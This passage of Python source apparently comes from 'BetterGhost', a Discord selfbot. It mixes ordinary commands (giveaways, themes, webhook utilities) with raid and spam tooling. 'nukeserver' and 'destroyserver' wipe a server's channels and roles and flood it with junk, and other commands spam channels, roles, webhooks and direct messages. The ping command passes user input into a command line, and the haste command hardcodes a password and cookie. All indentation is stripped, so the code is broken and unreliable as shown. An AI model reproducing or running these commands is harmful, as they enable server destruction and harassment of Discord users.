#running = False
if "🎉 **GIVEAWAY** 🎉" in msg.content:
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{BetterGhost.user.id}>")
nowinner = False
if entries != []:
nowinner = False
winnerslist = []
if winners >= 2:
for _ in range(winners):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
#running = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
newe = discord.Embed(
description=f"A winner was not determined.\nHosted by {ctx.author.mention}",
color=0x36393F)
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
newe = discord.Embed(
description=', '.join(winnerslist) + f" won!\nHosted by {ctx.author.mention}",
color=0x36393F)
newe.set_author(name=prize)
if winners >= 2:
newe.set_footer(text=f"{winners} winners | Ended at")
else:
newe.set_footer(text="1 winner | Ended at")
future = datetime.now() + timedelta(seconds=time)
newe.timestamp = future
await msg.edit(content="🎉 **GIVEAWAY ENDED** 🎉", embed=newe)
#elif "🎉 **GIVEAWAY ENDED** 🎉" in msg.content:
#running = False
else:
await ctx.send(
f"❌ **Incorrect Syntax**\nTry: `{BetterGhost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
else:
await ctx.send(f"❌ **Incorrect Syntax**\nTry: `{BetterGhost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
else:
await ctx.send(f"❌ **Incorrect Syntax**\nTry: `{BetterGhost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
@BetterGhost.command(name="gend", description="End a giveaway", usage="gend [message id]", aliases=["giveawayend", "endgiveaway"])
async def gend(ctx, id: int = None):
#running = False
msgId = ""
msgAuthorId = ""
msgContent = ""
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
#print(channelMsgHistory)
for message in channelMsgHistory:
#print(message.id)
if message.id == id:
msgId = message.id
msgAuthorId = message.author.id
msgContent = message.content
msg = message
#print("Fetched Message ID: " + str(msgId))
#print("Looking for Message ID: " + str(id))
#print("Message author ID: " + str(msgAuthorId))
#print("Bot user ID: " + str(BetterGhost.user.id))
if msgId == id and msgAuthorId == BetterGhost.user.id:
if "🎉 **GIVEAWAY** 🎉" in msgContent:
#running = True
embeds = msg.embeds
for embed in embeds:
embed_dict = embed.to_dict()
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{BetterGhost.user.id}>")
nowinner = False
if "winners" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winners | Ends at", "")
elif "winner" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winner | Ends at", "")
prize = embed_dict['author']['name']
if entries != []:
nowinner = False
winnerslist = []
if int(winners) >= 2:
for _ in range(int(winners)):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
newe = discord.Embed(
description=f"A winner was not determined.\nHosted by {ctx.author.mention}", color=0x36393F)
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
newe = discord.Embed(
description=', '.join(winnerslist) + f" won!\nHosted by {ctx.author.mention}",
color=0x36393F)
newe.set_author(name=embed_dict['author']['name'])
if int(winners) >= 2:
newe.set_footer(text=f"{winners} winners | Ended at")
else:
newe.set_footer(text=f"{winners} winner | Ended at")
newe.timestamp = datetime.now()
await msg.edit(content="🎉 **GIVEAWAY ENDED** 🎉", embed=newe)
elif "🎉 **GIVEAWAY ENDED** 🎉" in msgContent:
#running = False
await ctx.send("😔 That giveaway has already ended.")
else:
await ctx.send("That is not a giveaway.")
else:
await ctx.send("That is not a giveaway.")
@BetterGhost.command(name="greroll", description="Re-roll a giveaway", usage="greroll [message id]", aliases=["giveawayreroll", "rerollgiveaway"])
async def greroll(ctx, id: int = None):
#running = False
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
for message in channelMsgHistory:
if message.id == id:
msg = message
if msg.author.id == BetterGhost.user.id:
if "🎉 **GIVEAWAY** 🎉" in msg.content:
#running = True
await ctx.send("You can't re-roll a running giveaway.")
elif "🎉 **GIVEAWAY ENDED** 🎉" in msg.content:
#running = False
embeds = msg.embeds
for embed in embeds:
embed_dict = embed.to_dict()
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{BetterGhost.user.id}>")
nowinner = False
if "winners" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winners | Ended at", "")
elif "winner" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winner | Ended at", "")
prize = embed_dict['author']['name']
if entries != []:
nowinner = False
winnerslist = []
if int(winners) >= 2:
for _ in range(int(winners)):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
else:
await ctx.send("That is not a giveaway.")
else:
await ctx.send("That is not a giveaway.")
typing = False
@BetterGhost.command(name="typing", description="Start or stop typing.", usage="typing [start/stop]", aliases=["inftyping", "infintetyping"])
async def typing__(ctx, action = None):
global typing
if action == "start" or action == "Start":
await ctx.send("Started typing.")
typing = True
while typing is True:
async with ctx.typing():
await asyncio.sleep(1)
if typing is False:
break
elif action == "stop" or action == "Stop":
await ctx.send("Stopped typing.")
typing = False
elif action is None:
pass
@BetterGhost.command(name="sounds", description="Toggle BetterGhost notification sounds.", usage="sounds", aliases=["togglesounds", "soundstoggle"])
async def sounds(ctx):
cfg = Config.getConfig()
if cfg["sounds"]:
cfg["sounds"] = False
else:
cfg["sounds"] = True
Config.saveConfig(cfg)
await ctx.send(f"Sounds set to `{cfg['sounds']}`.")
@BetterGhost.command(name="notifications", description="Toggle BetterGhost notifications.", usage="notifications", aliases=["togglenotifications", "notificationstoggle"])
async def notifications(ctx):
cfg = Config.getConfig()
if cfg["toastnotifications"]:
cfg["toastnotifications"] = False
else:
cfg["toastnotifications"] = True
Config.saveConfig(cfg)
await ctx.send(f"Notifications set to `{cfg['toastnotifications']}`.")
@BetterGhost.command(name="ping", description="Ping a domain or ip address.", usage="ping [ip/domain]")
async def ping(ctx, *, dns):
message = await ctx.send("Pinging...")
output = subprocess.run(f"ping {dns}",text=True,stdout=subprocess.PIPE).stdout.splitlines()
values = "".join(output[-1:])[4:].split(", ")
minimum = values[0][len("Minimum = "):]
maximum = values[1][len("Maximum = "):]
average = values[2][len("Average = "):]
address = output[1].replace(f"Pinging {dns} [", "").replace("] with 32 bytes of data:", "")
if __embedmode__:
embed = discord.Embed(title=f"{dns} ping..", color=__embedcolour__)
embed.add_field(name="IP Address", value=f"```{address}```", inline=False)
embed.add_field(name="Minimum", value=f"```{minimum}```", inline=False)
embed.add_field(name="Maximum", value=f"```{maximum}```", inline=False)
embed.add_field(name="Average", value=f"```{average}```", inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="Pong!", embed=embed, delete_after=__deletetimeout__)
else:
await message.edit(content=f"""```ini
[ {dns} ping.. ]
IP Address: {address}
Minimum: {minimum}
Maximum: {maximum}
Average: {average}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="cloneserver", description="Clone a server.", usage="cloneserver", aliases=["copyserver"])
async def cloneserver(ctx):
serverName = ctx.guild.name
serverIcon = ctx.guild.icon
newGuild = await BetterGhost.create_guild(serverName)
print_info(f"Created new guild.")
newGuildDefaultChannels = await newGuild.fetch_channels()
for channel in newGuildDefaultChannels:
await channel.delete()
for channel in ctx.guild.channels:
if str(channel.type).lower() == "category":
try:
await newGuild.create_category(channel.name, overwrites=channel.overwrites, position=channel.position)
print_info(f"Created new category : {channel.name}")
except:
pass
for channel in ctx.guild.voice_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_voice_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new voice channel : {channel.name}")
except:
pass
for channel in ctx.guild.stage_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_stage_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new stage channel : {channel.name}")
except:
pass
for channel in ctx.guild.text_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_text_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new text channel : {channel.name}")
except:
pass
for role in ctx.guild.roles[::-1]:
if role.name != "@everyone":
try:
await newGuild.create_role(name=role.name, color=role.color, permissions=role.permissions, hoist=role.hoist, mentionable=role.mentionable)
print_info(f"Created new role : {role.name}")
except:
pass
await ctx.send(f"Made a clone of `{ctx.guild.name}`.")
@BetterGhost.command(name="webhooksetup", description="Create a new server with webhooks.", usage="webhooksetup", aliases=["setupwebhooks"])
async def webhooksetup(ctx):
global __nitrowebhook__, __privnotewebhook__, __giveawaywebhook__, __ghostpingwebhook__, __friendsupdatewebhook__, __dmtypingwebhook__, __guildleavewebhook__, __selfbotwebhook__, __ticketswebhook__
iconFile = open("data/icon.png", "rb")
icon = bytes(iconFile.read())
configFile = json.load(open("config.json"))
guild = await BetterGhost.create_guild("BetterGhost Notifications", icon=icon)
newGuildDefaultChannels = await guild.fetch_channels()
for channel in newGuildDefaultChannels:
await channel.delete()
for channel in guild.text_channels:
await channel.delete()
for channel in guild.voice_channels:
await channel.delete()
for channel in guild.categories:
await channel.delete()
category = await guild.create_category_channel("Webhooks")
nitroWebhookChannel = await category.create_text_channel("nitro-sniper")
privnoteWebhookChannel = await category.create_text_channel("privnote-sniper")
giveawayWebhookChannel = await category.create_text_channel("giveaway-sniper")
ghostPingWebhookChannel = await category.create_text_channel("ghost-pings")
friendUpdatesWebhookChannel = await category.create_text_channel("friend-updates")
dmTypingWebhookChannel = await category.create_text_channel("dm-typing")
guildLeaveWebhookChannel = await category.create_text_channel("guild-leave")
selfbotsWebhookChannel = await category.create_text_channel("selfbots")
ticketsWebhookChannel = await category.create_text_channel("tickets")
nitroWebhook = await nitroWebhookChannel.create_webhook(name="BetterGhost Nitro Sniper")
privnoteWebhook = await privnoteWebhookChannel.create_webhook(name="BetterGhost Privnote Sniper")
giveawayWebhook = await giveawayWebhookChannel.create_webhook(name="BetterGhost Giveaway Sniper")
ghostPingWebhook = await ghostPingWebhookChannel.create_webhook(name="BetterGhost Pings")
friendUpdatesWebhook = await friendUpdatesWebhookChannel.create_webhook(name="Friend Updates")
dmTypingWebhook = await dmTypingWebhookChannel.create_webhook(name="DM Typing")
guildLeaveWebhook = await guildLeaveWebhookChannel.create_webhook(name="Guild Leave")
selfbotsWebhook = await selfbotsWebhookChannel.create_webhook(name="Selfbots")
ticketsWebhook = await ticketsWebhookChannel.create_webhook(name="Tickets")
__nitrowebhook__ = nitroWebhook.url
__privnotewebhook__ = privnoteWebhook.url
__giveawaywebhook__ = giveawayWebhook.url
__ghostpingwebhook__ = ghostPingWebhook.url
__friendsupdatewebhook__ = friendUpdatesWebhook.url
__dmtypingwebhook__ = dmTypingWebhook.url
__guildleavewebhook__ = guildLeaveWebhook.url
__selfbotwebhook__ = selfbotsWebhook.url
__ticketswebhook__ = ticketsWebhook.url
configFile["webhooks"]["nitro"] = __nitrowebhook__
configFile["webhooks"]["privnote"] = __privnotewebhook__
configFile["webhooks"]["giveaway"] = __giveawaywebhook__
configFile["webhooks"]["ghostping"] = __ghostpingwebhook__
configFile["webhooks"]["friendsupdate"] = __friendsupdatewebhook__
configFile["webhooks"]["dmtyping"] = __dmtypingwebhook__
configFile["webhooks"]["guildleave"] = __guildleavewebhook__
configFile["webhooks"]["selfbot"] = __selfbotwebhook__
configFile["webhooks"]["tickets"] = __ticketswebhook__
json.dump(configFile, open("config.json", "w"), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title="Webhook Setup", description=f"Created a new guild for your webhooks called `{guild.name}`.", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Created a new guild for your webhooks called `{guild.name}`.", delete_after=__deletetimeout__)
@BetterGhost.command(name="spamwebhook", description="Spam the shit out of a webhook.", usage="spamwebhook [amount] [url] (message)")
async def spamwebhook(ctx, amount: int, url, *, message = None):
if __embedmode__:
embed = discord.Embed(title="Spamming webhook...", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Spamming webhook...", delete_after=__deletetimeout__)
if message is None:
for _ in range(amount):
spamMsg = ''.join(random.choice(string.ascii_letters) for i in range(2000))
webhook = DiscordWebhook(url=url, content=spamMsg)
webhook.execute()
else:
for _ in range(amount):
webhook = DiscordWebhook(url=url, content=message)
webhook.execute()
if __embedmode__:
embed = discord.Embed(title="Finished spamming webhook", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Finished spamming webhook!", delete_after=__deletetimeout__)
@BetterGhost.command(name="newwebhook", description="Create a webhook in the command channel.", usage="newwebhook [name]", aliases=["createwebhook"])
async def newwebhook(ctx, *, name):
webhook = await ctx.channel.create_webhook(name=name)
if __embedmode__:
embed = discord.Embed(title=f"Created a webhook called {name}", description=f"URL: {webhook.url}", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Created a webhook called {name}\nURL: {webhook.url}", delete_after=__deletetimeout__)
@BetterGhost.command(name="delwebhook", description="Delete a webhook from the ID.", usage="delwebhook [id]", aliases=["deletewebhook", "removewebhook"])
async def delwebhook(ctx, id: int):
webhook = await BetterGhost.fetch_webhook(id)
await webhook.delete()
if __embedmode__:
embed = discord.Embed(title="Deleted the webhook", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Deleted the webhook", delete_after=__deletetimeout__)
@BetterGhost.command(name="webhookinfo", description="Information about the webhook.", usage="webhookinfo [id]", aliases=["webhooklookup", "lookupwebhook"])
async def webhookinfo(ctx, id: int):
webhook = await BetterGhost.fetch_webhook(id)
if __embedmode__:
embed = discord.Embed(title=f"{webhook.name} Information", colour=__embedcolour__)
embed.add_field(name="Webhook Name", value=f"```{webhook.name}```", inline=False)
embed.add_field(name="Webhook ID", value=f"```{webhook.id}```", inline=False)
embed.add_field(name="Webhook Guild", value=f"```{webhook.guild.name}```", inline=False)
embed.add_field(name="Webhook Channel", value=f"```{webhook.channel.name}```", inline=False)
embed.add_field(name="Webhook Token", value=f"```{webhook.token}```", inline=False)
embed.set_thumbnail(url=webhook.avatar_url)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ {webhook.name} Information ]
Webhook Name: {webhook.name}
Webhook ID: {webhook.id}
Webhook Guild: {webhook.guild.name}
Webhook Channel: {webhook.channel.name}
Webhook Token: {webhook.token}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="dumpchat", description="Get the chat's history.", usage="dumpchat [amount] (channel id) (oldest first, true/false)", aliases=["savechat", "chathistory"])
async def dumpchat(ctx, amount: int, channelId: int = None, oldestFirst: bool = False):
if channelId is None:
messages = await ctx.channel.history(limit=amount, oldest_first=oldestFirst).flatten()
f = open("chat_history.txt", "a")
try:
f.write(f"Chat history for #{ctx.channel.name} in {ctx.guild.name}\nSaved a total of {len(messages)} messages.\n \n")
except:
f.write(f"Saved a total of {len(messages)} messages.\n \n")
for msg in messages:
try:
f.write(f"[{msg.created_at.strftime('%m/%d/%Y, %H:%M:%S')}] {msg.author.name}#{msg.author.discriminator}: {msg.content}\n")
except:
pass
f.close()
await ctx.send("Generated the chat history.", file=discord.File("chat_history.txt"))
os.remove("chat_history.txt")
else:
channel = BetterGhost.get_channel(channelId)
messages = await channel.history(limit=amount, oldest_first=oldestFirst).flatten()
f = open("chat_history.txt", "a")
try:
f.write(f"Chat history for #{channel.name} in {channel.guild.name}\nSaved a total of {len(messages)} messages.\n \n")
except:
f.write(f"Saved a total of {len(messages)} messages.\n \n")
for msg in messages:
try:
f.write(f"[{msg.created_at.strftime('%m/%d/%Y, %H:%M:%S')}] {msg.author.name}#{msg.author.discriminator}: {msg.content}\n")
except:
pass
f.close()
await ctx.send("Generated the chat history.", file=discord.File("chat_history.txt"))
os.remove("chat_history.txt")
@BetterGhost.command(name="newtheme", description="Create a new theme with the given name.", usage="newtheme [name]", aliases=["createtheme"])
async def newtheme(ctx, *, name):
if not os.path.isfile(f'themes/{name}.json'):
name = name.replace(" ", "-")
f = open(f'themes/{name}.json', "w")
f.write("""
{
"embedtitle": "BetterGhost Recoded",
"embedcolour": "#708ffa",
"embedfooter": "",
"embedfooterimage": "",
"globalemoji": ":ghost:",
"embedimage": ""
}
""")
f.close()
if __embedmode__:
embed = discord.Embed(title="Theme create with the name " + name, colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Theme create with the name {name} ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="A theme with that name already exists", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ A theme with that name already exists ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="deltheme", description="Delete the named theme.", usage="deltheme [name]", aliases=["deletetheme", "removetheme"])
async def deltheme(ctx, *, name):
if not os.path.isfile(f'themes/{name}.json'):
if __embedmode__:
embed = discord.Embed(title="A theme with that name doesnt exist", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ A theme with that name doesnt exist ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
os.remove(f'themes/{name}.json')
if __embedmode__:
embed = discord.Embed(title="Theme with the name " + name + " was deleted", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Theme with the name {name} was deleted ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="theme", description="Change your current theme.", usage="theme [theme]", aliases=["settheme"])
async def theme__(ctx, *, theme):
if os.path.isfile(f'themes/{theme}.json'):
updateTheme(theme + ".json")
Config.changeTheme(theme)
if __embedmode__:
embed = discord.Embed(title="That theme has been set", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ That theme has been set ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="A theme with that name doesnt exist", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ A theme with that name doesnt exist ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="prefix", description="Set the command prefix.", usage="prefix [prefix]", aliases=["c"])
async def prefix(ctx, *, prefix):
Config.changePrefix(prefix)
if __embedmode__:
embed = discord.Embed(title=f"Prefix changed to `{prefix}`", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Prefix changed to {prefix} ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="restart", description="Restart BetterGhost selfbot.", usage="restart", aliases=["reboot", "reload"])
async def restart(ctx):
print_info("Restarting ghost...")
await ctx.send("Restarting ghost...")
restart_bot()
@BetterGhost.command(name="firstmessage", description="Get the first message in the command channel.", usage="firstmessage")
async def firstmessage(ctx):
messages = await ctx.channel.history(limit=1, oldest_first=True).flatten()
for message in messages:
firstMessage = message
if __embedmode__:
embed = discord.Embed(title="First Message", description=f"{firstMessage.jump_url}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"First message: {firstMessage.jump_url}")
@BetterGhost.command(name="haste", description="Upload text to BetterGhost's Haste site.", usage="haste [text]")
async def haste(ctx, *, text):
url = "https://haste.ghost.cool/haste"
payload=f'password=h5MEn3ptby4XSdxJ&text={text}&username={ctx.author.name}'
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': '__cfduid=dffeb66149683e21f8e860ea28116dd7d1613823909'
}
response = requests.request("POST", url, headers=headers, data=payload)
await ctx.send(response.text)
@BetterGhost.command(name="shrug", description="Shrug your arms.", usage="shrug")
async def shrug(ctx):
await ctx.send(f"¯\_(ツ)_/¯")
@BetterGhost.command(name="tableflip", description="Flip the table.", usage="tableflip")
async def tableflip(ctx):
await ctx.send("(╯°□°)╯︵ ┻━┻")
@BetterGhost.command(name="unflip", description="Put the table back.", usage="unflip")
async def unflip(ctx):
await ctx.send("┬─┬ ノ( ゜-゜ノ)")
# @BetterGhost.command(name="hide", description="Hide a message behind another message.", usage="hide [msg1] [msg2]")
# async def hide(ctx, msg1, msg2):
# await ctx.send(msg1+hideText+msg2)
@BetterGhost.command(name="blank", description="Send a blank message", usage="blank")
async def blank(ctx):
await ctx.send("** **")
@BetterGhost.command(name="length", description="Get the length of a string.", usage="length [string]", aliases=["stringlength"])
async def length(ctx, *, string):
await ctx.send(f"Length of `{string}`: " + len(string))
@BetterGhost.command(name="lmgtfy", description="Let me Google that for you.", usage="lmgtfy [search]", aliases=["letmegooglethatforyou"])
async def lmgtfy(ctx, *, search):
await ctx.send(f"https://lmgtfy.app/?q={search.replace(' ', '+')}")
@BetterGhost.command(name="selfbotcheck", description="Checks for users using a selfbot.", usage="selfbotcheck")
async def selfbotcheck(ctx):
await ctx.send("Checking for users with a trash selfbot...\nPeople who react below are using a selfbot.")
await ctx.send("GIVEAWAY")
await ctx.send("🎉 **GIVEAWAY** 🎉")
@BetterGhost.command(name="nukeserver", description="Delete all roles and channels in the command server.", usage="nukeserver", aliases=["nukeguild"])
async def nukeserver(ctx):
if __riskmode__:
if ctx.author.guild_permissions.administrator:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="destroyserver", description="Completely destroy the command server.", usage="destroyserver", aliases=["destroyguild"])
async def destroyserver(ctx):
if __riskmode__:
if ctx.author.guild_permissions.administrator:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
name = ''.join(random.choice(string.ascii_letters) for i in range(100))
await ctx.guild.edit(name=name)
for _ in range(500):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_text_channel(name=f'{name}')
await ctx.guild.create_role(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="spamchannels", description="Spam create channels with a desired name. (Thanks Port <3)", usage="spamchannels [amount] (name)", aliases=["spamcreatechannels"])
async def spamchannels(ctx, amount: int, *, name = None):
if __riskmode__:
if ctx.author.guild_permissions.manage_channels:
if name is None:
for _ in range(amount):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_text_channel(name=f'{name}')
else:
for _ in range(amount):
await ctx.guild.create_text_channel(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="spamroles", description="Spam create roles with a desired name.", usage="spamroles [amount] (name)", aliases=["spamcreateroles"])
async def spamroles(ctx, amount: int, *, name = None):
if __riskmode__:
if ctx.author.guild_permissions.manage_roles:
if name is None:
for _ in range(amount):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_role(name=f'{name}')
else:
for _ in range(amount):
await ctx.guild.create_role(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="deletechannels", description="Delete all of the command server's channels.", usage="deletechannels", aliases=["delchannels", "removechannels"])
async def deletechannels(ctx):
if __riskmode__:
if ctx.author.guild_permissions.manage_channels:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="deleteroles", description="Delete all of the command server's roles.", usage="deleteroles", aliases=["delroles", "removeroles"])
async def deleteroles(ctx):
if __riskmode__:
if ctx.author.guild_permissions.manage_roles:
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="dmspam", description="Spam DM messages X amount of times.", usage="dmspam [amount] [delay] [@user] [message]", aliases=["spamdm"])
async def dmspam(ctx, amount: int, delay: int, user: discord.User, *, message):
if __riskmode__:
for _ in range(amount):
try:
await user.send(message)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
